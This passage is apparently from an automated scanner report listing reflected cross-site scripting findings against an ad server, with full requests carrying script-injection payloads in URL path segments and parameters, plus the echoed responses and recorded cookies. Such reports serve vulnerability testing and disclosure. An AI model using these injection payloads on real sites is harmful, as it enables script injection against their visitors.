Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM770f6"><script>alert(1)</script>7298dce66c/2010DM/754220993/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

4.320. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1169827066@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c10"><script>alert(1)</script>d8743e92489 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe4c10"><script>alert(1)</script>d8743e92489/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe4c10"><script>alert(1)</script>d8743e92489/1999546154/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.321. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1169827066@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5e6"><script>alert(1)</script>7b9a5b33a77 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1169827066@x23ce5e6"><script>alert(1)</script>7b9a5b33a77?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1486659847/x23ce5e6"><script>alert(1)</script>7b9a5b33a77/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.322. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1169827066@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 734aa"-alert(1)-"2615324c30b was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728734aa"-alert(1)-"2615324c30b HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728734aa"-alert(1)-"2615324c30b";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.323. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1169827066@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d43f2"-alert(1)-"d90c9fa87b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&d43f2"-alert(1)-"d90c9fa87b4=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&d43f2"-alert(1)-"d90c9fa87b4=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.324. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11711169344@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b9a"><script>alert(1)</script>00e60963e9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMc2b9a"><script>alert(1)</script>00e60963e9e/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMc2b9a"><script>alert(1)</script>00e60963e9e/2010DM/442642699/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.325. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11711169344@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1236"><script>alert(1)</script>bb4a83ff16b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMc1236"><script>alert(1)</script>bb4a83ff16b/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMc1236"><script>alert(1)</script>bb4a83ff16b/301824280/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.326. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11711169344@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63148"><script>alert(1)</script>79a363b6f58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11711169344@x2363148"><script>alert(1)</script>79a363b6f58?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:42:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1217507998/x2363148"><script>alert(1)</script>79a363b6f58/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.327. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11711169344@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_TF_CT_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30a32"-alert(1)-"68d1cedd6ec was submitted in the USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_72830a32"-alert(1)-"68d1cedd6ec HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2481
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_TF_CT_72830a32"-alert(1)-"68d1cedd6ec";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.328. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11711169344@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cea2"-alert(1)-"68fd8c2db03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728&5cea2"-alert(1)-"68fd8c2db03=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2484
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_TF_CT_728&5cea2"-alert(1)-"68fd8c2db03=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.329. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/117382567@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425ff"><script>alert(1)</script>83713a5700b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM425ff"><script>alert(1)</script>83713a5700b/2010DM/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM425ff"><script>alert(1)</script>83713a5700b/2010DM/1891759279/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.330. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/117382567@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fbb4"><script>alert(1)</script>e91f36c3ebf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM4fbb4"><script>alert(1)</script>e91f36c3ebf/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
